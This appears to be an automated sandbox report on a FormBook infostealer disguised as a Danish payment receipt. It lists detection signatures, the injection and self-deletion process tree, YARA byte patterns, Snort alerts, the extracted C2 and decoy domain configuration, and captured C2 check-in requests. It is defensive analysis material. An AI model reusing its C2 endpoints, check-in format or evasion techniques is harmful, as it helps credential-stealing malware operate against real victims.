Loading ...

Play interactive tourEdit tour

Windows Analysis Report Betalingskvittering.exe

Overview

General Information

Sample Name:Betalingskvittering.exe
Analysis ID:510324
MD5:ff904170ad5767db6b6066400972cc99
SHA1:ae326e46c0a7649659faca436ddefc232f3f18d7
SHA256:ee4b441c93ac2eb13f0cc02b060836e8538fa08bc434cf8b87552f820dc8563e
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Betalingskvittering.exe (PID: 6364 cmdline: 'C:\Users\user\Desktop\Betalingskvittering.exe' MD5: FF904170AD5767DB6B6066400972CC99)
    • Betalingskvittering.exe (PID: 6404 cmdline: 'C:\Users\user\Desktop\Betalingskvittering.exe' MD5: FF904170AD5767DB6B6066400972CC99)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6836 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6928 cmdline: /c del 'C:\Users\user\Desktop\Betalingskvittering.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bbyyn10.xyz/b0us/"], "decoy": ["wxoi.xyz", "boss-note-to-look-today.info", "rxgmarket.com", "vyfstudio.com", "insularrofioa.xyz", "psikologtenaysude.com", "hepatitiscsignssymptoms.space", "toadvalleyfarm.com", "rhinobeds.com", "joystoreworld.com", "wethinky.com", "cucciolamores.com", "finansresultation.com", "criptodigital.online", "cave21shop.com", "ryannaat.xyz", "xn--ngbr0em.com", "olympiaapartment.com", "asrendo.com", "dashmints.com", "hampadco.com", "hoanghuong.group", "yamamoto-d-c.net", "cynthiaessential.com", "malatirada.com", "c5group-th.com", "v9ayiditq3.com", "tucows.website", "patinamedicalgroup.com", "xn--vckvb6c8f088nlxg8mqrw1d.com", "securetravel.trade", "eachallness.center", "vongquaymembersshipvn.com", "sexbattu.com", "libertymattersmost.net", "improvfilmproduction.com", "cryptohealthplan.com", "pandabearsoftware.com", "mininoheya.com", "chimichael.com", "rescueandrestoreministries.net", "alookbehindtheseams.com", "unimedplanos.net", "bobazzing.com", "cabidat.xyz", "playgroundcrew.website", "tsoharformation.com", "ninjadigital.agency", "inkedbreadcompany.com", "kirieducationschool.com", "genitalestetikbodrum.com", "agronotion.com", "bentonvillesquareartist.com", "harekrishnajapayagna.com", "fflashes.net", "stogelair.com", "stkittsaquaculture.com", "peiyaousa.com", "publicschools.fail", "bankhelpassist.xyz", "ip-sat.com", "redeyeops.com", "kavirab.com", "thefurniturepractice-btr.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.Betalingskvittering.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.Betalingskvittering.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.Betalingskvittering.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        1.1.Betalingskvittering.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.Betalingskvittering.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bbyyn10.xyz/b0us/"], "decoy": ["wxoi.xyz", "boss-note-to-look-today.info", "rxgmarket.com", "vyfstudio.com", "insularrofioa.xyz", "psikologtenaysude.com", "hepatitiscsignssymptoms.space", "toadvalleyfarm.com", "rhinobeds.com", "joystoreworld.com", "wethinky.com", "cucciolamores.com", "finansresultation.com", "criptodigital.online", "cave21shop.com", "ryannaat.xyz", "xn--ngbr0em.com", "olympiaapartment.com", "asrendo.com", "dashmints.com", "hampadco.com", "hoanghuong.group", "yamamoto-d-c.net", "cynthiaessential.com", "malatirada.com", "c5group-th.com", "v9ayiditq3.com", "tucows.website", "patinamedicalgroup.com", "xn--vckvb6c8f088nlxg8mqrw1d.com", "securetravel.trade", "eachallness.center", "vongquaymembersshipvn.com", "sexbattu.com", "libertymattersmost.net", "improvfilmproduction.com", "cryptohealthplan.com", "pandabearsoftware.com", "mininoheya.com", "chimichael.com", "rescueandrestoreministries.net", "alookbehindtheseams.com", "unimedplanos.net", "bobazzing.com", "cabidat.xyz", "playgroundcrew.website", "tsoharformation.com", "ninjadigital.agency", "inkedbreadcompany.com", "kirieducationschool.com", "genitalestetikbodrum.com", "agronotion.com", "bentonvillesquareartist.com", "harekrishnajapayagna.com", "fflashes.net", "stogelair.com", "stkittsaquaculture.com", "peiyaousa.com", "publicschools.fail", "bankhelpassist.xyz", "ip-sat.com", "redeyeops.com", "kavirab.com", "thefurniturepractice-btr.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: www.bbyyn10.xyz/b0us/Avira URL Cloud: Label: phishing
          Source: http://www.bbyyn10.xyz/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48XAvira URL Cloud: Label: phishing
          Machine Learning detection for sampleShow sources
          Source: Betalingskvittering.exeJoe Sandbox ML: detected
          Source: 1.0.Betalingskvittering.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.1.Betalingskvittering.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cmd.exe.295d8d0.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.Betalingskvittering.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 0.2.Betalingskvittering.exe.f010000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Betalingskvittering.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Betalingskvittering.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Betalingskvittering.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Betalingskvittering.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 7.2.cmd.exe.31b796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.Betalingskvittering.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Betalingskvittering.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004035EB GetEncryptedFileVersionExt,lstrcatA,lstrlenA,lstrcmpiA,GetFileAttributesA,LoadImageA,RegisterClassA,SystemParametersInfoA,CreateWindowExA,ShowWindow,GetClassInfoA,GetClassInfoA,GetClassInfoA,RegisterClassA,DialogBoxParamA,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00404F56 GetEncryptedFileVersionExt,OleInitialize,OleUninitialize,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00401000 DefWindowProcA,GetEncryptedFileVersionExt,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_0040140B GetEncryptedFileVersionExt,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00402836 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00404FC2 GetEncryptedFileVersionExt,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004047D3 GetDlgItem,GetDlgItem,GetDlgItem,SendMessageA,GetEncryptedFileVersionExt,GlobalAlloc,LoadBitmapA,SetWindowLongA,ImageList_Create,ImageList_AddMasked,SendMessageA,SendMessageA,SendMessageA,DeleteObject,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowLongA,SetWindowLongA,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ImageList_Destroy,GlobalFree,SendMessageA,SendMessageA,SendMessageA,InvalidateRect,ShowWindow,ShowWindow,GetDlgItem,ShowWindow,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004012E2 GetEncryptedFileVersionExt,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004058E6 GetShortPathNameA,CloseHandle,GetShortPathNameA,GetShortPathNameA,wsprintfA,GetEncryptedFileVersionExt,GetFileSize,GlobalAlloc,ReadFile,SetFilePointer,WriteFile,GlobalFree,CloseHandle,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,GetEncryptedFileVersionExt,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00403F9C CheckDlgButton,GetDlgItem,SendMessageA,SendMessageA,GetEncryptedFileVersionExt,GetSysColor,SendMessageA,SendMessageA,lstrlenA,SendMessageA,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,LoadCursorA,LoadCursorA,SetCursor,SetCursor,ShellExecuteA,LoadCursorA,SetCursor,SendMessageA,SendMessageA,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004038B4 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt,SetWindowTextA,
          Source: Betalingskvittering.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: Betalingskvittering.exe, 00000000.00000003.352403148.000000000F050000.00000004.00000001.sdmp, Betalingskvittering.exe, 00000001.00000002.408971728.0000000000940000.00000040.00000001.sdmp, cmd.exe, 00000007.00000002.613167685.0000000002BF0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe, 00000007.00000000.408444946.00000000002A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Betalingskvittering.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exeDomain query: www.bbyyn10.xyz
          Source: C:\Windows\explorer.exeDomain query: www.chimichael.com
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.176.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.45.211 80
          Source: C:\Windows\explorer.exeDomain query: www.inkedbreadcompany.com
          Source: C:\Windows\explorer.exeDomain query: www.malatirada.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.insularrofioa.xyz
          Source: C:\Windows\explorer.exeDomain query: www.bobazzing.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.4.98.67 80
          Source: C:\Windows\explorer.exeDomain query: www.finansresultation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.40.182 80
          Source: C:\Windows\explorer.exeDomain query: www.improvfilmproduction.com
          Source: C:\Windows\explorer.exeDomain query: www.rxgmarket.com
          Source: C:\Windows\explorer.exeDomain query: www.joystoreworld.com
          Source: C:\Windows\explorer.exeDomain query: www.tucows.website
          Source: C:\Windows\explorer.exeDomain query: www.olympiaapartment.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.bbyyn10.xyz
          Source: C:\Windows\explorer.exeDNS query: www.insularrofioa.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bbyyn10.xyz/b0us/
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1Host: www.bobazzing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1Host: www.improvfilmproduction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1Host: www.olympiaapartment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1Host: www.malatirada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1Host: www.finansresultation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1Host: www.rxgmarket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1Host: www.joystoreworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1Host: www.bbyyn10.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1Host: www.inkedbreadcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
